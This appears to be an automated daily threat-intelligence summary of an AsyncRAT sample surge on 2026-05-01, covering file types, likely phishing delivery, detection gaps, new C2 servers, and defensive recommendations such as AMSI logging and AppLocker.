Daily Summary
AsyncRAT activity surged sharply on 2026-05-01, with 53 new samples detected against a 7-day average of 25, marking a 114% increase. This spike represents the most significant single-day volume in the observed period and may indicate the launch of a new campaign or automated distribution wave.
New Samples Detected
Executables (.exe) dominate at 33 samples (62%), consistent with typical AsyncRAT delivery. PowerShell scripts (.ps1) account for 9 samples, suggesting continued use of living-off-the-land techniques. The presence of 2 .js files and 1 .dll indicates modular delivery chains, potentially leveraging script-based droppers that load the core payload via memory-only execution. The inclusion of 2 .zip and 1 .rar archives points to staged delivery where the RAT is bundled inside compressed files to evade initial detection.
Distribution Methods
Delivery appears multi-vector. The prevalence of .ps1 scripts alongside executable files suggests phishing campaigns that use malicious email attachments or links leading to script downloads. The 5 .bat files indicate batch scripting as an initial loader, often disguised as legitimate system updates or software patches. The archive files (.zip, .rar) imply social engineering through fake invoices, order confirmations, or shipping notifications that lure users into extracting and running the payload.
Detection Rate
Preliminary static analysis of today’s samples shows uneven detection across antivirus engines. Common signatures for AsyncRAT are likely catching older variants, but the use of script-based loaders (PowerShell, JS, batch) may result in lower detection rates since those scripts can be heavily obfuscated. The memory-only DLL execution path is particularly concerning as it bypasses disk-based scanning. SOC teams should deploy behavioral detection rules focusing on process injection and outbound C2 beaconing.
C2 Infrastructure
Today saw 100 new C2 servers recorded and 153 new IOCs, a substantial expansion of the command-and-control network. The high volume of new servers suggests rapid rotation or a fresh infrastructure pool, likely hosted on cheap VPS or cloud platforms to hinder takedown efforts. No geographic pattern is discernible from the data provided, but the volume points to diversified hosting.
7-Day Trend
Today’s volume of 53 samples is more than double the 7-day average of 25, representing a clear upward break from prior days. If this pace continues, AsyncRAT activity may signal a sustained campaign rather than a one-day anomaly.
Security Analysis
The sharp increase in .ps1 and .bat scripts alongside the large spike in new C2 servers points to a coordinated seeding operation. This mirrors tactics seen in recent AsyncRAT campaigns that use GitHub or Pastebin to host scripted loaders, which then download the main executable. The notable change is the increased use of 1 DLL file, suggesting frictionless execution via DLL sideloading or regsvr32. Actionable recommendation: Enable AMSI (Antimalware Scan Interface) logging for PowerShell and log all script block executions; block execution of scripts from untrusted sources via AppLocker or WDAC.